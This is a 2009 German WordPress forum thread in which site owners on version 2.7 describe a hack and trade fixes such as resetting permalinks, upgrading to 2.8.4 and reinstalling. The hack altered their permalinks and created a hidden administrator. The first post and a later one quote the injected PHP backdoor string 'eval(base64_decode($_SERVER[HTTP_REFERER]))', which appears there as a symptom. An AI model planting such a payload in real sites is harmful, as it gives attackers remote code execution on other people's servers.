1. Herzlich willkommen bei WPDE.org, dem grössten und ältesten deutschsprachigen Community-Forum rund um das Thema WordPress. Du musst angemeldet oder registriert sein, um Beiträge verfassen zu können.
    Information ausblenden

Nichts ist aufrufbar

Dieses Thema im Forum "Installation" wurde erstellt von BMB, 4. September 2009.

  1. BMB

    BMB Well-Known Member

    Registriert seit:
    2. März 2007
    Beiträge:
    202
    Zustimmungen:
    0
    Internetseite: www.deutschland-debatte.de
    Traffic: ca. 2500/Tag
    WP 2.7

    Problem: die Seitenaufrufe funktionieren, die Artikel und Kommentaraufrufe haben eine falsche Befehlsstruktur/Permalink. Beispiel:

    Permalink: http://www.deutschland-debatte.de/2009/09/03/der-volksverra…etzt-sich-fortder-volksverrat-durch-spd-setzt-sich-fort/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/.

    Fehlermeldung:
    "Fehlerhafte Anfrage!

    Ihr Browser (oder Proxy) hat eine ungültige Anfrage gesendet, die vom Server nicht beantwortet werden kann.

    Sofern Sie dies für eine Fehlfunktion des Servers halten, informieren Sie bitte den Webmaster hierüber.
    Error 400
    www.deutschland-debatte.de
    Fri Sep 4 05:27:02 2009
    Apache/2.0.54 (Debian GNU/Linux) "

    Was läuft hier falsch?
     
  2. dennis-b

    dennis-b Member

    Registriert seit:
    25. Juli 2008
    Beiträge:
    16
    Zustimmungen:
    0
    Hatte ich heute nacht auch, keine Ahnung wieso das umgestellt wurde.

    Aber die Lösung liegt unter:
    Einstellungen › Permalinks
    und dann z.B. wieder auf Standard setzen.

    Gruß,

    Dennis
     
  3. BMB

    BMB Well-Known Member

    Registriert seit:
    2. März 2007
    Beiträge:
    202
    Zustimmungen:
    0
    Dennis, ich weiß nicht, wie ich dir danken kann!!!! Es war richtig.

    Aber die Frage ist für mich: ich war nicht daran - wer kann das über Nacht ändern?

    Wenn ich prüfe, wer Administrator ist, wird mir angezeigt Administrator (4), jedoch werden nur 3 Administratoren aufgelistet. Wie kriege ich den 4. raus?

    Wenn du das auch hattest, gibt es eine Möglichkeit, von "außen" den Schalter zu betätigen?
     
    #3 BMB, 4. September 2009
    Zuletzt bearbeitet: 4. September 2009
  4. dennis-b

    dennis-b Member

    Registriert seit:
    25. Juli 2008
    Beiträge:
    16
    Zustimmungen:
    0
    Wie gesagt, hatte das gleiche Problem.

    Erstmal auf 2.8.3 upgrade gemacht, da es wohl einen Rechtefehler gibt, der es via Abonnentenrolle Änderungen durchzuführen. Da könnte evtl. die Lücke für den Hack liegen.
     
  5. BMB

    BMB Well-Known Member

    Registriert seit:
    2. März 2007
    Beiträge:
    202
    Zustimmungen:
    0
    Dennis,
    ich hab Befürchtungen beim upgrade meiner Seite! Wie geht man am besten vor? Mein früherer Admin ist nicht mehr ....

    Ich hab gerade gesehen, dass in meiner config.php, wo lt. Anweisung stehen müsste:


    • Seit Version 2.6: Der SECRET_KEY (siehe Seit Version 2.5 oder 2.5.1) wurde durch drei Keys ersetzt. define('SECRET_KEY', 'XXXXXXXXXX'); muss also aus der wp-config.php entfernt werden - sofern vorhanden (da erst ab Version 2.5 unterstützt). Stattdessen muss folgender Code nach der Zeile define(’DB_COLLATE’, ”); eingefügt werden:
    define('AUTH_KEY', 'XXX');
    define('SECURE_AUTH_KEY', 'YYY');
    define('LOGGED_IN_KEY', 'ZZZ');



    die secret keys nicht aufgelistet sind. Kann das die Ursache sein?
     
    #5 BMB, 4. September 2009
    Zuletzt bearbeitet: 4. September 2009
  6. andrew

    andrew Member

    Registriert seit:
    12. März 2007
    Beiträge:
    20
    Zustimmungen:
    0
    Bei mir hat sich auch der fehlerhafte Code eingeschlichen. Habs dann in den Permalinkeinstellungen in der Benutzerdefinierten Struktur rausgelöscht und nun funktioniert es wieder. Upgraden ist grade in Arbeit. ;)
    Danke für den Tipp!
     
  7. jottlieb

    jottlieb Well-Known Member
    Ehrenmitglied

    Registriert seit:
    20. August 2005
    Beiträge:
    17.381
    Zustimmungen:
    0
  8. BMB

    BMB Well-Known Member

    Registriert seit:
    2. März 2007
    Beiträge:
    202
    Zustimmungen:
    0
    Was ist die Ursache?????

    Ich habe meine Admins gefragt: keiner war im Ordner Permalink! Da muss doch jemand von außen das machen können!
     
  9. zackary

    zackary Member

    Registriert seit:
    26. Januar 2009
    Beiträge:
    8
    Zustimmungen:
    0
    Habe das gleiche Problem schon hier gepostet. Hier geht aber die Diskussion schön weiter. Mein Problem wäre jetzt das ich die Struktur nicht unbedingt ändern möchte. Wäre es wohl eine Lösung die Wordpress Version zu updaten?

    Und falls ja, erstmal Permalinks auf standart setzen, updaten und dann wieder auf Permalinks setzen? Oder einfach updaten ohne rücksicht auf Verluste?

    Habe Wordpress 2.7 noch.. vielleicht ist das das Problem.
     
  10. BMB

    BMB Well-Known Member

    Registriert seit:
    2. März 2007
    Beiträge:
    202
    Zustimmungen:
    0
    "Habe Wordpress 2.7 noch.. vielleicht ist das das Problem." danke für den Link; hatte danach gesucht und nicht gefunden.

    Auch ich hab noch 2.7 ! Und ohne Sicherheitsschlüssel ( war von meinem früheren Admin so installiert worden ).
     
  11. zackary

    zackary Member

    Registriert seit:
    26. Januar 2009
    Beiträge:
    8
    Zustimmungen:
    0
    Scheint wohl an der Version zu liegen. Naja.. später werde ich dann mal ein Update durchführen.. meld mich dann wieder.
     
  12. BMB

    BMB Well-Known Member

    Registriert seit:
    2. März 2007
    Beiträge:
    202
    Zustimmungen:
    0
    zackary, was ist dein Stand nach update?
     
  13. NHQ

    NHQ Member

    Registriert seit:
    1. Oktober 2008
    Beiträge:
    21
    Zustimmungen:
    0
    Hab mich grad bei Mashable und Lorelle Mörder-erschrocken, weil die in Weltuntergang machen deswegen:



    Gott, hoffentlich geht der Kelch an mir vorüber, hab nicht die Zeit für son Scheiß... 284 ist also safe???
     
  14. michipedia

    michipedia Member

    Registriert seit:
    11. Juni 2009
    Beiträge:
    17
    Zustimmungen:
    0
  15. Domino5702

    Domino5702 Well-Known Member

    Registriert seit:
    30. April 2009
    Beiträge:
    2.634
    Zustimmungen:
    0
    Für diejenigen, die auch nicht Zahlen lesen können:
    Wenn Sie ein selbst betriebenes Wordpress haben und nicht 2.8.4 betreiben, wird dringend geraten, unverzüglich auf die aktuelle Version zu updaten, um keinen Angriff zu riskieren. Blogger auf Wordpress.com sind nicht betroffen.

    Ich finde es unverantwortlich, wie hier von manchen auf Panik gemacht wird.


     
  16. NHQ

    NHQ Member

    Registriert seit:
    1. Oktober 2008
    Beiträge:
    21
    Zustimmungen:
    0
    Naja, Lorelle und Mashable sind ja nun Quellen mit erheblichem Standing, die den Teufel da schon an die Wand malen. Und weil im WPD-Blog schon von 285 die Rede war, find ich es nur berechtigt, nachzufragen, ob die Community mehr weiß... Denn offenbar ist es eben nicht genug, upzugraden, wenn das Kind schon in den Brunnen gefallen ist. Und ich möcht nicht in meine Datenbank steigen müssen... Vorsicht ist besser als Nachtschicht ;)
     
  17. Domino5702

    Domino5702 Well-Known Member

    Registriert seit:
    30. April 2009
    Beiträge:
    2.634
    Zustimmungen:
    0
    Hallo NHQ,

    Die meinte ich auch nicht .... denn diese Quellen haben auch klar geschrieben, dass die aktuelle Version nicht betroffen ist. Weshalb zitierst Du nicht den Absatz - daher die Vermutung, dass das lesen von Zahlen auch in der fremden Sprache auf Schwierigkeiten stösst ;)
     
  18. NHQ

    NHQ Member

    Registriert seit:
    1. Oktober 2008
    Beiträge:
    21
    Zustimmungen:
    0
    Ich hatte das schon richtig vernommen mit 284, bin auch nicht betroffen, aber bei DB-Beteiligung - wie bei diesem Hack offenbar - gebranntes Kind und daher um Gewißheit aus dem stets gut informierten User/Mod-Kreis bemüht... schließlich ist 284 nun auch schon wieder was her, könnt ja sein, das da vor 285 noch was kommt oder vorgezogen wird, wenns denn so nen brennendes Prob ist, wie die US-Kollegen da schreiben...
     
  19. BMB

    BMB Well-Known Member

    Registriert seit:
    2. März 2007
    Beiträge:
    202
    Zustimmungen:
    0
    Hallo,

    also, ich habe 2.7 noch am Laufen. Ich habe getest, was auf der Seite steht:

    "
    There are strange additions to the pretty permalinks, such as example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/. The keywords are “eval” and “base64_decode.”
    The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution."


    trifft absolut auf meinen Blog zu:
    a) der andere Permalink
    b) ein nicht sichtbarer Admin.


    BITTE: was muss ich nun tun. Ich komme in den Admin- Bereich, ich bin aber kein EDV- Fachmann! Gibt es irgendwelche Risiken für die Datenbank? Ich habe über 2500 Artikel auf meiner Seite!
     
    #19 BMB, 5. September 2009
    Zuletzt bearbeitet: 5. September 2009
  20. Domino5702

    Domino5702 Well-Known Member

    Registriert seit:
    30. April 2009
    Beiträge:
    2.634
    Zustimmungen:
    0
    Der von NHQ zitierte Abschnitt sagt im Wesentlichen: die in Wordpress eingebaute Export-Funktion nutzen, um alle Beiträge zu sichern, Wordpress deinstallieren und neu einrichten mit der Version 2.8.4 (also auch insbesondere Plugins und Theme) und danach die Inhalte wieder importieren. Die Dokumentation liefert Dir weitere Hilfen. Zu beachten ist, dass die von Dir vorgenommenen Änderungen an Wordpress-Core Dateien dabei verloren gehen, somit erneut vorgenommen werden müssen. Ebenfalls ratsam ist es, seinen Plugin und Theme Ordner zu sichern und nach dem Update wieder zurückzuspielen.

    Es ist keine Kleinigkeit, ich rate Dir dazu, dies von einem Fachmann, der mit Deiner Installation vertraut ist, machen zu lassen.

    LG Domi
     
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden